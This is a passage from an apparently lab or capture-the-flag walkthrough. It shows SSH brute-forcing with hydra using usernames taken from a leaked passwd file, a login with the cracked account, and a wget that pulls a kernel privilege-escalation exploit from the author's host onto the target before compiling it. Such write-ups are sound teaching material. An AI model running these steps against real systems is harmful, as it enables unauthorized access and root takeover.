<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 1240 Jun 03 21:49 group-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:07 grub.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 0 42 1004 Jun 04 20:13 gshadow</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 995 Jun 03 21:49 gshadow-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 gss</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 92 Oct 22 2015 host.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 12 Jun 03 13:57 hostname</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 469 Jun 05 16:38 hosts</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 411 Jun 03 13:51 hosts.allow</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 711 Jun 03 13:51 hosts.deny</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 1257 Jun 03 18:01 inetd.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Feb 06 22:02 inetd.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 init</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 init.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 13:49 initramfs-tools</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 1748 Feb 04 18:17 inputrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:49 insserv</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 771 Mar 06 2015 insserv.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 19:20 insserv.conf.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 iproute2</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:05 iptables</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:48 iscsi</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 345 Jun 09 21:08 issue</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 197 Jun 03 23:26 issue.net</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 kbd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 13:51 kernel</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 144 Jun 03 13:53 kernel-img.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 26754 Jun 07 01:56 ld.so.cache</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 34 Jan 27 15:17 ld.so.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 07 01:57 ld.so.conf.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 ldap</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 267 Oct 22 2015 legal</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 191 Jan 19 00:16 libaudit.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 libnl-3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 06 23:17 lighttpd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2995 Apr 14 23:09 locale.alias</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 9149 Jun 03 13:49 locale.gen</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 3687 Jun 03 13:49 localtime</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 6 0 0 4096 Jun 03 14:17 logcheck</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 10551 Mar 29 10:25 login.defs</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 703 May 06 2015 logrotate.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 00:01 logrotate.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 103 Apr 12 21:12 lsb-release</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 lvm</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-r--r--r-- 1 0 0 33 Jun 03 13:54 machine-id</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 111 Nov 20 2015 magic</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 111 Nov 20 2015 magic.mime</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2579 Jun 04 00:29 mailcap</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 449 Oct 30 2015 mailcap.order</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 mdadm</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 24241 Oct 30 2015 mime.types</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 967 Oct 30 2015 mke2fs.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 modprobe.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 195 Apr 20 23:09 modules</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 modules-load.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lrwxrwxrwx 1 0 0 19 Jun 03 13:54 mtab -> ../proc/self/mounts</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 06 22:16 mysql</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 7 0 0 4096 Jun 03 13:49 network</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 91 Oct 22 2015 networks</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 newt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 497 May 04 2014 nsswitch.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Apr 20 23:08 opt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lrwxrwxrwx 1 0 0 21 Jun 03 13:49 os-release -> ../usr/lib/os-release</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 6595 Jun 23 2015 overlayroot.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 552 Mar 16 19:09 pam.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 21:49 pam.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 2869 Jun 03 23:10 passwd-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:51 perl</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 14:17 php</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 06 23:17 phpmyadmin</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 pm</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 13:51 polkit-1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 19:20 postfix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:49 ppp</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 575 Oct 22 2015 profile</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 profile.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2932 Oct 25 2014 protocols</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:38 python</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:38 python2.7</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 python3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 python3.5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 0 0 472 Jun 06 17:32 rc.local</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc0.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc1.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc2.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc3.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc4.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc5.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc6.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 22:41 rcS.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 23 Jun 09 21:08 resolv.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 06 23:17 resolvconf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 0 0 268 Nov 10 2015 rmt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 887 Oct 25 2014 rpc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 1371 Jan 27 23:42 rsyslog.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 19:20 rsyslog.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 09 21:07 samba</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 3663 Jun 09 2015 screenrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 4038 Mar 29 10:25 securetty</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:49 security</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 selinux</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 19605 Oct 25 2014 services</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 sgml</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 0 42 4518 Jun 05 17:59 shadow</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 1873 Jun 03 23:10 shadow-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 125 Jun 03 15:20 shells</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 skel</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 100 Nov 25 2015 sos.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 20:15 ssh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 20:17 ssl</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 644 Jun 04 20:13 subgid</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 625 Jun 03 14:46 subgid-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 644 Jun 04 20:13 subuid</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 625 Jun 03 14:46 subuid-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-r--r----- 1 0 0 769 Jun 05 18:01 sudoers</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 sudoers.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2227 Jun 03 15:22 sysctl.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 sysctl.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 13:49 systemd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 terminfo</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 14 Jun 03 13:49 timezone</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Apr 12 11:30 tmpfiles.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 1260 Mar 16 21:58 ucf.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:49 udev</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ufw</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 23:15 update-motd.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:52 update-notifier</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 vim</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:54 vmware-tools</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 278 Jun 03 23:48 vsftpd.banner</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 0 Jun 03 23:22 vsftpd.chroot_list</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 5961 Jun 04 20:15 vsftpd.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 0 Jun 03 23:21 vsftpd.user_list</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lrwxrwxrwx 1 0 0 23 Jun 03 13:49 vtrgb -> /etc/alternatives/vtrgb</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 4942 Jan 08 14:18 wgetrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 xdg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 xml</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 15:20 zsh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">226 Directory send OK.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> </span><br />
<br />
The content looks from '/etc' directory. I collected the users from 'passwd' file.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# cat passwd | grep '/bin/bash' | cut -d: -f1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">RNunemaker</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ETollefson</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DSwanger</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AParnell</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MBassin</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">JBare</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LSolum</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MFrei</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SStroud</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">JKanode</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CJoo</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Drew</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jess</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHAY</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mel</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">zoe</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">NATHAN</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">elly</span><br />
<br />
And ran hydra against SSH service with '-e nsr' option.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# hydra -L user-list.txt -e nsr 192.168.1.3 ssh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-09 13:11:15</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[DATA] max 16 tasks per 1 server, overall 64 tasks, 84 login tries (l:28/p:3), ~0 tries per task</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[DATA] attacking service ssh on port 22</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[22][ssh] host: 192.168.1.3 login: SHayslett password: SHayslett</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[STATUS] 85.00 tries/min, 85 tries in 00:01h, 4294967295 todo in 00:01h, 16 active</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[STATUS] 28.33 tries/min, 85 tries in 00:03h, 4294967295 todo in 1193046:29h, 16 active</span><br />
<br />
And we have one ssh account. Let's log in.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# ssh SHayslett@192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-----------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ Barry, don't forget to put a message here ~</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-----------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@192.168.1.3's password: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Welcome back!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ id</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 28</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 SHayslett SHayslett 4096 Jun 9 23:41 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 32 root root 4096 Jun 4 20:13 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 5 Jun 5 18:24 .bash_history</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 SHayslett SHayslett 220 Sep 1 2015 .bash_logout</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 SHayslett SHayslett 3771 Sep 1 2015 .bashrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwx------ 2 SHayslett SHayslett 4096 Jun 9 23:41 .cache</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 SHayslett SHayslett 675 Sep 1 2015 .profile</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ lsb_release -a</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">No LSB modules are available.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Distributor ID:<span class="Apple-tab-span" style="white-space: pre;"> </span>Ubuntu</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Description:<span class="Apple-tab-span" style="white-space: pre;"> </span>Ubuntu 16.04 LTS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Release:<span class="Apple-tab-span" style="white-space: pre;"> </span>16.04</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Codename:<span class="Apple-tab-span" style="white-space: pre;"> </span>xenial</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$</span><br />
<br />
Next sstep is to get root privileges for which we need local privilege escalation vulnerability. There are multiple ways to do it. The simplest way is to check the machine and look for exploit on exploit-db. The machine is Ubuntu 16.04 LTS. A quick check results into this exploit by Project Zero team:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><a href="https://www.exploit-db.com/exploits/39772/">https://www.exploit-db.com/exploits/39772/</a></span><br />
Exploit Code:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><a href="https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552">https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552</a></span><br />
<br />
My kali VM didn't had Internet access, so I downloaded the exploit on my host and hosted on webserver. Let's get this exploit on target where we already have shell access and hope it works !!<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ wget http://192.168.1.5/exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">--2016-06-10 00:17:40-- http://192.168.1.5/exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connecting to 192.168.1.5:80... connected.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HTTP request sent, awaiting response... 200 OK</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Length: 20480 (20K) [application/x-tar]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Saving to: ‘exploit.tar’</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">exploit.tar 100%[========================>] 20.00K --.-KB/s in 0.001s </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2016-06-10 00:17:40 (34.8 MB/s) - ‘exploit.tar’ saved [20480/20480]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ ls</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ tar -xf exploit.tar </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ ls</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ebpf_mapfd_doubleput_exploit exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ cd ebpf_mapfd_doubleput_exploit/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~/ebpf_mapfd_doubleput_exploit$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 28</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-x--- 2 SHayslett SHayslett 4096 Apr 25 23:25 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 SHayslett SHayslett 4096 Jun 10 00:20 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-x--- 1 SHayslett SHayslett 155 Apr 25 23:25 compile.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 4188 Apr 25 23:25 doubleput.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 2186 Apr 25 23:25 hello.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 255 Apr 25 23:25 suidhelper.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~/ebpf_mapfd_doubleput_exploit$</span><br />
<br />
The exploit-db link shows how to use this.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~/ebpf_mapfd_doubleput_exploit$ ./compile.sh </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c: In function ‘make_setuid’:</span><br />
